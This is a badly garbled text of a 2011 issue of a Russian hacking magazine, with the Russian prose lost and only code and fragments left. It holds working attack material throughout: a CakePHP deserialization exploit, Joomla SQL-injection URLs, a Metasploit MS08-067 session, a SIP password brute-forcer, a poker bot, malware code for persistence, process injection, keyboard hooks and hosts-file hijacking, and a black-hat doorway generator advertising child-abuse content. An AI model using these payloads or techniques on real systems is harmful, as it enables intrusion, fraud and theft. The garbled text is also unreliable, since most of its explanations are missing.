(PostgreSQL, MySQL, SQLite, Oracle).
,
.
felix
,
unserialize ( ).
./libs/controller/components/
security.php , XSRF POST-:
<?php
function _validatePost(&$controller)
{
...
$check = $controller->data;
$token = urldecode($check['_Token']['fields']);
if (strpos($token, ':')) {
list($token, $locked) = explode(':', $token, 2);
}
$locked = unserialize(str_rot13($locked));
...
?>
047
CMS, CakePHP
.
,
__load App:
CakePHP
$check POST-,
$locked str_rot13()
,
.
,
][, , PHP.
, PHP 5 : . __construct,
__destruct.
unserialize() __
destruct-, .
PHP, - unserialize (
advisory suspekt.org/downloads/
POC2009-ShockingNewsInPHPExploitation.pdf).
App- ./libs/configure.php:
function __destruct()
{
if ($this->__cache)
{
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),
'_cake_core_');
Cache::write('file_map', array_filter($this->__map),
'_cake_core_');
Cache::write('object_map', $this->__objects,
'_cake_core_');
}
}
,
Cache.
file_map. PHP-,
048
<?php
...
if (file_exists($file)) {
if (!$this->return) {
require($file);
$this->__loaded[$file] = true;
}
return true;
...
?>
! $file
PHP-!
Remote File Inclusion ,
. LFI- , CakePHP
,
.
EXPLOIT
PoC
felix :
<?php
$x=new App();
$x->__cache=1;
$x->__map=array("Core" => array(
"Router" => "../tmp/cache/persistent/cake_core_file_map"),
"Foo" => "<? phpinfo(); exit(); ?>");
$x->__paths=array();
$x->__objects=array();
echo serialize($x);
?>
, CakePHP.
,
malloc.im/burnedcake.py.
,
CakePHP, POST- security-,
. ,
PHP-.
X 05 /148/ 2011
TARGETS
CakePHP <= 1.3.5, CakePHP <= 1.2.8
SOLUTION
CakePHP
cakephp.org.
03
SQL-
JOOMLA!
BRIEF
,
PHP JavaScript
MySQL. ,
GNU GPL.
Joomla!,
- :).
SQL-
, .
, YGN Ethical
Hacker Group (yehg.net/lab) 1.5.21.
, SQL- Joomla! 1.5.20 XSS.
,
1.5.21.
, YEHG
, , Joomla!
.
SQL- ,
, , .
, ./components/com_weblinks/models/category.
php :
function _buildQuery()
{
$filter_order = $this->getState('filter_order');
$filter_order_dir = $this->getState('filter_order_dir');
$filter_order = JFilterInput::clean($filter_order, 'cmd');
$filter_order_dir =
JFilterInput::clean($filter_order_dir, 'word');
// We need to get a list of all
// weblinks in the given category
$query = 'SELECT *' .
X 05 /148/ 2011
return $query;
}
, .
1.6.
EXPLOIT
Joomla! <= 1.5.21:
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir=&filter_order=%00'
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir='&filter_order=asc
Joomla! 1.6.0:
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,&filter_order_
Dir=2&limit=3&limitstart=4
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBB,&limit=3&limit
start=4
049
bing.com
:
JFilterInput::clean filter_order_Dir filter_order,
.
, -
,
.
TARGETS
Joomla! <= 1.5.21, Joomla! 1.6.0
SOLUTION
, joomla.org.
CMS 1.5.22 1.6.0 .
04
MICROSOFT INTERNET EXPLORER
BRIEF
IE, cyber flash.
-.
-
.
-
.
EXPLOIT
PoC HTML-:
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=http://www.
keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
var mywin=open("about:blank", "mywindow",
"location=1,scrollbars=0,width=300,height=290");
050
IE
mywin.location.href="http://www.keyloggeronline.com/misc/
temp/a.php?http://www.bing.com/" + Array(5).join(" ") + " ";
self.blur();
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>
cyber flash
PoC- keyloggeronline.com/misc/temp/about.htm.
, , bing.com. ,
,
. ,
Internet Explorer (, Download,
,
, - ).
, .
TARGETS
MS Internet Explorer 7, 8, 9
SOLUTION
, , IE,
. z
X 05 /148/ 2011
Dot.err (kaifoflife@bk.ru)
,
,
!
partypoker.com
- .
, . , .
, , -
,
- .
- ,
. ,
, .
. ,
,
partypoker.com :).
052
Flop aka
, .
//etc. ,
.
, . ,
.
-. X 05 /148/ 2011
.
, :).
Turn
, :
1.
partypoker.com.
2. -.
3.
.
4. .
,
,
.
.
12801024,
,
,
.
, , ,
. ,
, .
, ,
.
Unit3.cpp.
....
TABLE, :
TABLE table1;
...
-:
table1.position = "1";
...
table1.last_cards = "start";
...
X 05 /148/ 2011
dvd
,
:)
table1.position = Form1->Edit1->Text.c_str();
...
.
. ,
.
P4 2800MHZ, 1 .
while(true) {
Sleep(2000);
:
check_situation(table1.situation, table2.situation,
table3.situation, table4.situation);
Form1->Label34->Caption = table1.situation.c_str();
Form1->Label35->Caption = table2.situation.c_str();
Form1->Label36->Caption = table3.situation.c_str();
Form1->Label37->Caption = table4.situation.c_str();
, , .
.
,
. ,
:
if (table_1_start == "go") {
1.
, .
,
. ,
aka
, .
, ,
.
2.
, .
,
,
.
3. ,
-. ,
,
,
:).
4. , -
,
.
5. .
, :).
DVD
- , :
if (table1.situation=="check" ||
table1.situation == "call_0.10" ||
table1.situation=="call_0.05" ||
table1.situation=="call_many" ||
table1.situation=="allin") {
WARNING
warning
!
.
,
.
INFO
info
, -
,
!
,
-
,
.
table1.combination = "--";
table1.action = "--";
:
check_p_cards( 1, table1.p_card_1, table1.p_card_2);
Form1->Label26->Caption = table1.p_card_1.c_str();
Form1->Label27->Caption = table1.p_card_2.c_str();
check_t_cards( 1,table1.t_card_1,table1.t_card_2,
table1.t_card_3,table1.t_card_4,table1.t_card_5);
Form1->Label11->Caption = table1.t_card_1.c_str();
Form1->Label12->Caption = table1.t_card_2.c_str();
Form1->Label13->Caption = table1.t_card_3.c_str();
053
Form1->Label14->Caption = table1.t_card_4.c_str();
Form1->Label15->Caption = table1.t_card_5.c_str();
( /
/etc):
check_position(1, table1);
Form1->Label62->Caption = table1.position.c_str();
.
- :
shortstack(1, table1);
table1.action:
Form1->Label38->Caption = table1.action.c_str();
Form1->Label58->Caption = table1.combination.c_str();
, . :
mouse_click(1, table1);
, ,
, .
:
write_stat(1, table1);
, , .
table1.last_cards = table1.p_card_1 + table1.p_card_2;
.
. . outfile_name
, . startX
startY height width.
void PRINT_RECT_SVV (char* outfile_name,
int startX, int startY, int width, int height)
// GetDC
054
// . 0 -
{
HDC hdc = GetDC(0);
if (hdc) //
{
Graphics::TBitmap* bmp = new Graphics::TBitmap();
__try {
bmp->Width = width;
bmp->Height = height;
// p p hdc bmp,
// pp , SRCCOPY
BitBlt(bmp->Canvas->Handle, 0, 0, width, height,
hdc, startX, startY, SRCCOPY);
bmp->SaveToFile(outfile_name);
// BMP
}
__finally {
delete bmp; //
}
}
}
,
, : ?
,
.
MD5- ,
, .
MD5-
, :
bool CHECK_MD5_SVV (char* ET_fi le, char* newfile) {
md5wrapper md5;
//
std::string hash1 = md5.getHashFromFile(newfile);
// ,
std::string hash2 = md5.getHashFromFile(ET_fi le);
//
if (hash1==hash2) return true;
else return false;
}
.
:
void check_this_card (char* new_path, string &card) {
// A
if (CHECK_MD5_SVV(".\\ET\\ET_A_p.bmp", new_path))
{card = "Ap"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_k.bmp", new_path))
{card = "Ak"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_ch.bmp", new_path))
{card = "Ach"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_b.bmp", new_path))
{card = "Ab"; }
//
...
else { card = "--"; }
}
( , ) X 05 /148/ 2011
.
, :
void check_p_cards(int table, string &card1, string &card2) {
if (table==1) {
//
PRINT_RECT_SVV(".\\ET\\ch_card1_t1.bmp", 37,150,12,22);
//
PRINT_RECT_SVV(".\\ET\\ch_card2_t1.bmp", 55,150,12,22);
//
check_this_card(".\\ET\\ch_card1_t1.bmp", card1);
//
check_this_card(".\\ET\\ch_card2_t1.bmp", card2);
}
if (table==2) {
...
}
void check_t_cards (int table, string &card1, string &card2,
string &card3, string &card4, string &card5) {
if (table==1) {
PRINT_RECT_SVV(".\\ET\\t1c1.bmp",198,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c2.bmp",249,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c3.bmp",300,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c4.bmp",351,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c5.bmp",402,154,12,22);
//
check_this_card(".\\ET\\t1c1.bmp", card1);
check_this_card(".\\ET\\t1c2.bmp", card2);
check_this_card(".\\ET\\t1c3.bmp", card3);
check_this_card(".\\ET\\t1c4.bmp", card4);
check_this_card(".\\ET\\t1c5.bmp", card5);
}
if (table==2) {
...
}
.
, , , :
bool is_a_table (int table_number) {
if (table_number==1) {
PRINT_RECT_SVV(".\\ET\\is_a_table_1.bmp",5,5,95,25);
if (CHECK_MD5_SVV(".\\ET\\ET_is_table.bmp",
".\\ET\\is_a_table_1.bmp")) return true;
else return false;
}
if (table_number==2) {
...
,
. , -, , .
void mouse_click (int table_number, TABLE &this_table) {
...
if (this_table.action == "fold") {
SetCursorPos(x+380, y+410);
mouse_event(MOUSEEVENTF_LEFTDOWN, x+380, y+410,0,0);
Sleep(100);
mouse_event(MOUSEEVENTF_LEFTUP, x+380, y+410, 0, 0);
}
...
}
056
,
TABLE.
,
. , .
: mov ah,86h; mov dx,cx; int 15h.
! , !
,
:).
, .
, , (shortstack). (
, ),
( ).
// ,
if (this_table.t_card_1 == "--") {
// :
if (card_rank(this_table.p_card_1)==
card_rank(this_table.p_card_2)) {
// -
// -
if ((this_table.situation == "call_many")
||(this_table.situation == "allin")) {
//
// , - (all in)
if ((card_rank(this_table.p_card_1)>=9)
&& (this_table.trade_cycle>=2))
{this_table.action = "allin";}
//
//
// all-in
else if (card_rank(this_table.p_card_1)>=10)
{ this_table.action = "allin"; }
else { this_table.action = "fold"; }
//
// ( )
} else if ((this_table.situation == "check")
||(this_table.situation == "call_0.05")||
(this_table.situation == "call_0.10")) {
//
// ( )
...
, . , , .
.
.
,
.
, :).
River: all-in
,
: PartyPoker .
( -!)
- , .
: .
,
.
, . z
X 05 /148/ 2011
Total DVD
!
!
!u
vd.r
totald
()
CLIENT-SIDE
2004 , ?
2004
, client-side (
, )
2004 ,
.
Flash
Firefox
HTML
Java
Internet
Explorer
58
058
X 05 /148/ 2011
2011
, ,
. Flash
.
.
.
,
. ,
Adobe
,
.
. client-side
,
, .
, ,
Google
Chrome
ASLR
DEP
ASLR
DEP
,
. ,
(DEP, ASLR,
SEHOP).
, , .
,
ESET
Sandbox
Flash
IE 8
HTML
IE 7
ASLR
Firefox
ASLR
Kernel
DEP
Java
IE 6
X 05 /148/ 2011
59
059
Aggressor
VoIP!
VoIP-
IP- . , .
, , .
.
sipvicious, .
, svmap.py (
), VoIP-, : Cisco, AddPac,
Linksys . , web. , , , , . :). Linksys
web-. ,
.
060
, .
-,
. ,
... ,
. . ? web, ,
, , username
auth id ( ), .
, , .
, -.
403 ( ),
.
SIP-
, SIP-.
Softswitch (,
Asterisk) REGISTER, ,
contact. 401
Unauthorized, ,
Digest access authentication. nonce realm. nonce
realm ( ), username
( ), digesturi,
md5- response
Softswitch,
. , 200 ,
401. , , , ,
.
, peer,
username, , .
.
/etc/sip.conf
[peru]
type=friend
username=*username *
secret=helloworld
host=dynamic
disallow=all
allow=alaw
allow=ulaw
Wireshark
Submit all Changes. 10 ,
2 ,
INFO
, - . ,
tshark'e ,
info
.
Proxy .
,
Google.
(,
Wireshark). REGISTER response
intitle: Sipura
,
SPA Configuration,
. ,
,
,
CLI sip set debug on .
, ,
.
, , .
.
, goo.gl/Ravuu,
( ,
). ,
.
#!/usr/bin/python
import md5 # ,
md5-
#
EN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#
en = "abcdefghijklmnopqrstuvwxyz"
digits = "1234567890"
space = " "
p = ",.-!?;:'\"/()"
op = "+-*/:^()><="
all_spec = "'~!@#$%^&*-_=+\\|/?.>,>'\";:[]{}"
class ABCIterator:
# ... , :)
# ...
# ,
u=(raw_input('username >> '));
b=(raw_input('realm >> '));
m=(raw_input('method >> '));
061
SIP-
d = (raw_input('digestURI >> '));
r = (raw_input('response >> '));
n = (raw_input('nonce >> '));
print u,b,m,d,r,n;
ha2= md5.new(m+":"+d).hexdigest();
# ha2
response=0;
ch=0; #
#
for i in ABCIterator(start_len=1, stop_len=8, abc=digits+en):
# , 1,
# 8, #
#
ch = ch+1;
if ch % 500000 == 0: print i;
# 500000-
#
ha1 = md5.new(u+":"+b+":"+i).hexdigest();
response = md5.new(ha1+":"+n+":"+ha2).hexdigest(); #
if r == response: #
print "------------------>", i;
# ,
exit(0);
, ,
, . :).
, . ,
Proxy, username.
,
realm asterisk, digesturi . ,
REGISTER
401 nonce.
,
( ).
realm, digesturi, username,
REGISTER, nonce
-response,
response . 401 nonce
( sipp). ,
,
:). REGISTER sipp,
:
C sipp nonce.xml
<?xml version="1.0" encoding="ISO-8859-1" ?>
<scenario name="register">
062
sipp
<recv request="REGISTER"/>
<send>
<![CDATA[
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP [local_ip]:5060;
branch=[branch];received=[remote_ip]
From: *username *
<sip:*username *@*ip c Asterisk*>
To: *username *
<sip:*username *@*ip c Asterisk*>
Call-ID: [call_id]
CSeq: [cseq] REGISTER
Server: Asterisk PBX 1.6.2.13
Allow: INVITE, ACK, CANCEL,
OPTIONS, BYE, REFER, SUBSCRIBE,
NOTIFY, INFO
Supported: replaces, timer
WWW-Authenticate: Digest algorithm=MD5,
realm="asterisk", nonce="17852b0a"
Content-Length: [len]
]]>
</send>
</scenario>
tshark
. , .
, ,
.
, ,
( ), :). z
X 05 /148/ 2011
11
VOIP
VoIP- . ,
. ,
.
,
VoIP . . IP-
extension', . ,
,
. 11 . ?!
,
. ,
, , , . 23 500 ( 315 000
) ,
( ).
. . ,
,
Shadow Communication Company Ltd.
.
SIP-?
VoIP
PBX (private branch exchange) , - , .
,
SIPVicious (sipvicious.org), Python' . , ,
.
1. ( 192.168.1.1/24),
BPX.
[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device
| User Agent
|
--------------------------------------------| 192.168.1.103:5060 | Asterisk PBX
|
( , ,
),
. ,
,
, , .
,
VoIP. Shadow
Communication Company 1 541 187 11 094 167 .
: , VoIP-.
42 .
VoIP-
| 100
| 101
| reqauth
| noauth
|
|
extention 100 !
4. :
, IP- 192.168.1.103,
Asterisk PBX.
2. extention' ( , ) .
.
123!
[you@box sipvicious]$ ./svwar.py 192.168.1.103
| Extension | Authentication |
-----------------------------| 123
| reqauth
|
X 05 /148/ 2011
,
. -
SIP- (, X-Lite) .
063
M4g (icq 884888, snipper.ru)
red.Button
, SEO.
,
.
SEO,
.
.
?
, - :).
.
.
,
- . ,
,
064
,
- .
? :
,
, ,
.
:
,
.
X 05 /148/ 2011
: .
-
- ( )
, , ,
SEO .
, .
red.Button.
- SEO.
, :
,
, ,
,
,
..
, :
1. .
PPS (Pay Per Sale), (, ,
, , , ), PPC (Pay
Per Click) , PPL (Pay Per Lead)
.
.
, - .
,
.
SEO-.
2.
,
.
,
() .
3. .
.
, X 05 /148/ 2011
, red.Button
.
4. , ,
. ,
, .
,
, KeyWordKeeper.
5. .
6. - SEO . ,
(, ,
), , , ,
.
, , :
(, -
, , ,
);
;
AddUrl ( ).
7.
. , ,
: Site-Auditor,
ControlDoors .
8.
:).
, , .
, .
DVD
dvd
:
: ,
.;
2.3: ;
Magadan Lite: ,
2;
KeyWordKeeper 4.2.4:
;
ControlDoors: ;
Site Auditor:
,
2;
Red.Button
TRANSFORMER:
.
.?
, , .
.
, red.Button ,
2003 .
( Forum Generator),
,
. ,
2008 , -
065
, ,
. .
red.Button
.
Red.Button TRANSFORMER, .
. PHP 4-5 safe_mode.
:
;
;
FTP;
;
( );
(,
iframe, ajax),
, (c
);
;
;
;
(CP) ( child
porn);
html-, xml- rss-;
, BB-, HTML+BB,
SpamIT Vista VIP;
;
( );
;
;
,
;
;
;
;
;
, , ;
.
066
WAMP- Denwer.
C:\WebServers\home\
localhost\www http://
localhost.
admin/admin .
.
, : , , , .
:
1. :
: ;
: ;
;
X (
, , ,
1000 ( ,
);
: ;
( );
: , doorway1 (
);
URL / : (, http://doorway.com/doorway);
, , .
, SEO-,
, .
.
2. :
: ( );
: ;
: super_pack_theme (
C:\WebServers\home\localhost\www\yes\
shabs);
: 2-3 ,
2-3 ;
: 1 3%;
X 05 /148/ 2011
CP: ;
: 2 4;
: ;
: JS (!);
: ;
: ,
;
: 5 ;
: 3 7%;
: (map.html), RSS,
sitemap.xml, robots.txt.
. .
.
3. :
: ,
;
: ,
,
;
: ;
: ;
: ,
META Description , ,
, .
!!! ,
.
C:\WebServers\
home\localhost\www, doorway1
http://doorway.com/doorway ( ,
).
? :) ..
, ,
.
X 05 /148/ 2011
, -, ,
, .
-, ,
,
. HTML , .
( ).
, .
, , .
, -: Google PR, (
edu gov), Alexa Rank.
. SEO- .
( , )
.
.
. -
, - , .
SEO! z
067
(alumni.samara@gmail.com)
60
Windows
, Windows .
.
Windows ?
. !
068
History
23 2008 Microsoft MS08-067. ,
(958644).
Windows. ,
MS08-067
. , ,
Conficker/Downadup .
Microsoft $250 000 , . !,
. ,
.
Windows nmap,
Metasploit Framework. , nmap, 445, . , ,
? ,
IP- , bgp.he.net Prefixes IP v4.
nmap,
, my_isp.txt,
nmap. , ,
:
nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt
,
, ,
, 2008
... , nmap .
shell:
meterpreter
,
Meterpreter () Windows,
. MP, PHP JAVA. ,
X 05 /148/ 2011
OS Fingerprints . :)
, TCL-
shell- Cisco IOS tclpro.exe .
? :).
MP
Windows-, Metasploit Framework,
:
.
1. bind_meterpreter
.
Meterpretera , .
2. reverse_meterpreter
Meterpretera.
. , IP- (
NAT).
3. find_tag , , Meterpretera
,
. ,
, .
4. bind_tcp cmd.
exe, , ,
Meterpreter`a.
.
.
? ,
nmap, . .
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit> set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
, (cmd.exe) ,
, . ,
msf Windows 7,
069
FrameWork
64- , ( GUI),
.
( ).
.
. , !
, nmap, IP-
Windows 2003 Server
( , , !).
(exploit/windows/smb/ ms08_067_
netapi) bind_meterpreter. Meterpreter, token_adduser,
SYSTEM use priv. ,
,
. -, FTP -
- exploit, Metasploit
, :
.
, .
, Windows,
445
. ,
,
. , ,
, .
, Windows,
. :). z
070
X 05 /148/ 2011
(icq 884888, snipper.ru)
X-TOOLS
: File Uploader
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Napster
multi-up.com
(, , ).
-
. File Uploader
Napster.
:
4shared.com ( );
d.lsass.us;
depositfiles.com ( );
dump.ru ( );
fileshare.in.ua;
filetrash.ru;
ifolder.ru;
letitbit.net ( );
megaupload.com ( );
multi-up.com;
openfile.ru ( );
rapidshare.com ( );
rapidshare.de ( );
rapidshare.ru ( );
rghost.ru;
sendfile.su;
sendspace.com ( );
slil.ru;
uploadbox.com ( );
uploading.com ( );
yandex.ru ( ).
:
;
072
;
;
;
(RU/EN);
login/pass
;
;
Drag&Drop;
,
;
;
;
.
: blog.napster2k.tk.
: PHPFastScanner
: *nix/win
: Dr.Z3r0
Reverse-IP
- Reverse-IP
.
. !
PHPFastScanner Reverse-IP
PHP.
Reverse-IP.
:
Reverse-IP ( bing.com);
( 68 );
;
phpinfo, phpmyadmin, sypex dumper;
,
;
;
;
HEAD
( ,
);
;
(
);
Keep-Alive ( );
(
);
, , FAQ.
.
,
. ()
. PHPFastScanner
,
-.
,
][. Dr.Z3r0.
, :
1
- 1 ;
2
- 2 ;
3
- 10 ;
13 . 10
. ,
.
RDot: goo.gl/GaIrD.
X 05 /148/ 2011
: Free Mail
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdez Bil Ya
).
- ,
: goo.gl/tfSXF.
: QTss-Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: RankoR
(
)
. Free Mail
e-mail
.
:
Mail.ru (mail.ru, bk.ru, list.ru,
inbox.ru);
Rambler.ru;
Atlas.cz (atlas.cz, mujmail.cz);
Centrum.cz;
Bigmir.net;
Km.ru (km.ru, freemail.ru, bossmail.ru,
girlmail.ru, boymail.ru, megabox.ru,
safebox .ru);
Online.ua;
Meta.ua;
Xakep.ru;
I.ua (i.ua, fm.ua, email.ua, 3g.ua);
Yahoo.com;
Pochta.ru (qip.ru, pochta.ru,
hotmail.ru, fromru.com, front.ru,
hotbox.ru, krovatka.su, land.ru,
mail15.com, mail333.com, newmail.ru,
nightmail.ru, nm.ru, pisem.net,
pochtamt.ru, pop3.ru, rbcmail.ru,
smtp.ru).
:
;
;
(
), good.txt;
(
mail.ru);
.
, ,
(,
X 05 /148/ 2011
.
0 , good.txt
.
, .
CheckBox:
1. Code 0: , 0 , .
2. Skip Code Zero: ,
0,
.
!
,
, QTss-Brute, goo.gl/Q8Ujx.
: DValid Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zimper
, QTss
.
? ,
ActiveX- MS TS AX
Control, metala -
//. ,
Windows
.
:
1. GUI- . C++ Qt.
2. C WinSocke.
- C++ (Qt) C.
:
RDP
5 (
);
IP
3389;
;
, ;
;
10 ;
;
;
- .
,
,
0 (
),
DValid Checker Zimper.
:
;
good
.txt, bad.txt, unknown.txt;
;
6 ;
2 : ( .txt ,
);
;
;
;
.NET Framework.
:
1. Unknown ,
(
);
2. :
Windows XP ;
;
.
: noxzim.com/?p=415. z
073
MALWARE
.
(
) .
, . ? :
, ,
:
. ,
,
074
.
,
, ,
, .
, , ,
.
X 05 /148/ 2011
, - !
. AV- Avast, Avira, AVG, Comodo,
ClamAV.
.
Comodo Antivirus
Free, 5.3.181415.1237. Comodo,
,
. Defense+,
.
, Paranoid Mode, , ,
Safe Mode.
:
, ( )
.
.
ClamAV
Immunitet 3.0 ClamAV .
radiobutton
.
X 05 /148/ 2011
, . ,
Windows
hklm\software\windows\currentversion\run. :
wchar_t szFullPath[MAX_PATH] = {0};
GetModuleFileNameW(0, szFullPath, MAX_PATH);
HKEY hKey = 0;
RegOpenKeyW(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\
Windows\\CurrentVersion\\Run", &hKey);
075
MALWARE
Avira
Avast
AVG
+-
ClamAV
Comodo
UINT ExitCode = RegSetKeyValueW(hKey, 0, L"MalwareAutorun",
REG_SZ, szFullPath, lstrlenW(szFullPath) + 1);
.
. ? ,
: Avast Comodo ,
.
, ,
Token ( ).
,
. :
HANDLE hToken = 0;
UINT nReturnCode = 0;
LUID UID = {0};
TOKEN_PRIVILEGES TokenPrivileges = {0};
nReturnCode = OpenProcessToken(GetCurrentProcess(),
TOKEN_ALL_ACCESS, &hToken);
nReturnCode = LookupPrivilegeValueW(0, SE_DEBUG_NAME, &UID);
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Luid = UID;
TokenPrivileges.Privileges[0].Attributes = 0;
nReturnCode = AdjustTokenPrivileges(hToken, false,
&TokenPrivileges, 0, 0, 0);
,
AdjustTokenPrivileges. ? Comodo Avast
, .
.
, ,
.
, . ,
.
-:
076
UINT nReturnCode = 0;
HANDLE hExplorerProcess = 0,
hSnapshot = 0, hRemoteThread = 0;
PROCESSENTRY32W pe32 = {0};
UINT ExplorerID = 0;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32FirstW(hSnapshot, &pe32);
if(!lstrcmpiW(pe32.szExeFile, L"explorer.exe"))
ExplorerID = pe32.th32ProcessID;
else
{
for( ; nReturnCode = Process32NextW(hSnapshot, &pe32) ;)
{
if(!lstrcmpiW(pe32.szExeFile, L"iexplore.exe"))
{
ExplorerID = pe32.th32ProcessID;
break;
}
}
}
if(!ExplorerID)
return 0;
CloseHandle(hSnapshot);
hExplorerProcess = OpenProcess(PROCESS_ALL_ACCESS, 0,
ExplorerID);
PVOID pExplorerMemory = VirtualAllocEx(
hExplorerProcess, 0, 0x3000, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
nReturnCode = WriteProcessMemory (hExplorerProcess,
pExplorerMemory, ThreadFunc, 0x1000 ,0);
hRemoteThread = CreateRemoteThread(hExplorerProcess, 0, 0,
(LPTHREAD_START_ROUTINE)
pExplorerMemory, &ExplorerID, 0, 0);
Process32First/Process32Next iexplore.exe. , ,
ID ,
VirtualAllocEx.
ThreadFunc:
static DWORD ThreadFunc(LPVOID lpThreadParameter)
{
return 0;
}
X 05 /148/ 2011
ClamAV . ,
, ,
Avast
, DLL .
LoadLibrary,
HookProc . API SetWindowsHookEx
. DLL . ?
Comodo. Avast,
,
.
.
: hosts
, . ,
, , ,
.
, , , ,
.
:
HMODULE hDll = LoadLibraryW(L"DLL.dll");
PVOID pHookProc = (PVOID)GetProcAddress(hDll, "HookProc");
HHOOK hHook = SetWindowsHookExW(WH_KEYBOARD,
(HOOKPROC)pHookProc, hDll, 0);
DLL:
EXTERN_C __declspec(dllexport) DWORD HookProc(
int code, WPARAM wParam, LPARAM lParam)
{
return CallNextHookEx(0, code, wParam, lParam);
}
X 05 /148/ 2011
,
hosts,
IP-. , hosts:
HANDLE hFile = CreateFileW(
L"C:\\windows\\system32\\drivers\\etc\\hosts",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
HANDLE hMapping = CreateFileMappingW(hFile, 0,
PAGE_READWRITE, 0, 0, 0);
PVOID pHosts = MapViewOfFile(hMapping,
FILE_MAP_ALL_ACCESS, 0, 0, 0);
memcpy(pHosts, MalwareHost, lstrlenA(MalwareHost));
memcpy((char*)pHosts + lstrlenA(MalwareHost),
EndingBytes, sizeof(EndingBytes));
.
ReadFile/WriteFile,
MapViewOfFile, . Avast Comodo, ,
-, .
. , ?
, . ,
drive-by (xakep.ru/post/54161/default.asp)? ,
... z
077
MALWARE
, Senior malware researcher, ESET
. 1.
TRUE
-
URL
FALSE
3
SEO
BlackHat SEO
,
SEO
,
.
, , , .
,
.
Adware,
, , -
078
. , ,
, .
Win32/Patched.P
,
,
Win32/Patched.P (ESET).
X 05 /148/ 2011
3. WinSock
__in int flags
);
int recv(
__in SOCKET s,
__out char *buf,
__in int len,
__in int flags
);
int select(
__in
int nfds,
__inout fd_set *readfds,
__inout fd_set *writefds,
__inout fd_set *exceptfds,
__in
const struct timeval *timeout
);
. 2. -
2008 ,
, , .
Win32/Patched.P :
ws2_32.dll, (,
) MS Windows.
,
ws2_32.dll,
, ,
.
2 -,
, :
int WSASend(
__in SOCKET s,
__in LPWSABUF lpBuffers,
__in DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesSent,
__in DWORD dwFlags,
__in LPWSAOVERLAPPED lpOverlapped,
__in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int WSARecv(
__in
SOCKET s,
__inout LPWSABUF lpBuffers,
__in
DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesRecvd,
__inout LPDWORD lpFlags,
__in
LPWSAOVERLAPPED lpOverlapped,
__in
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int send(
__in SOCKET s,
__in const char *buf,
__in int len,
X 05 /148/ 2011
Winsock
, GET/POST
.
, .
, WSARecv(),
(. 3).
(. 1).
, , (. 5).
,
. ,
.
TDL4 Win32/Olmarik.AOV
, ,
TDL4 Win32/
Olmarik.AOV,
2011 . , ,
.
x64,
PatchGuard
64- . , -
. ,
Win32/Glupteba (ESET). ,
. ,
Win32/Glupteba TDL4 .
, TDL4
&C :
task_id = 2|10||hxxp://wheelcars.ru/no.exe
:
task_id = [command_id] [encryption_key] [URL]
DownloadAndExecute, ,
079
MALWARE
. 4. masterhost
http://mrjeep.info
(90.156.201.55)
http://juristmaster.ru
(90.156.201.100)
http://artvolley.info
(90.156.201.77)
http://antgreece.info
(90.156.201.41)
http://abadora.ru
(90.156.201.21)
90.156.201.0-90.156.201.255
Masterhost.ru
(Russian Federation)
http://wheelcars.ru
(90.156.201.12)
http://tehnologiya-materialov.ru
(90.156.201.81)
. 5.
,
, .
Win32/Glupteba C&C
(. . 7).
.
, .
. 7. Win32Glupteba
080
http://wolkintibet.net
(90.156.201.41)
http://avtoremontgaz.ru
(90.156.201.26)
http://kaskost.ru
(90.156.201.98)
. 6.
-,
. -, ,
Masterhost (. 4).
,
. Win32/Glupteba
,
,
. , .
Google AdWords,
,
.
TDL4 ,
, -
.
, Microsoft
Internet Explorer ActiveX- WebBrowser ( -
). ,
.
- . z
X 05 /148/ 2011
Mifrill (mifrill@real.xakep.ru)
Pwn2Own:
CanSesWest
.
BlackHat, HITB, , - . . .
, Pwn2Own
.
,
,
, , .
: Pwn
, Own :).
Pwn2Own , ,
CanSecWest (cansecwest.com).
, IT-,
: ,
. CanSecWest
,
,
IT- (Microsoft, Adobe, BlackBerry,
Intel ). , ,
. (, )
082
CanSecWest
,
. , ,
.
,
Pwn2Own ,
CanSecWest
2000-. ,
-
Pwn2Own
.
-
TippingPoint,
3Com, HewlettPackard.
,
Pwn2Own . ,
, ,
.
. , white
hat, , -
.
( ) Pwn2Own,
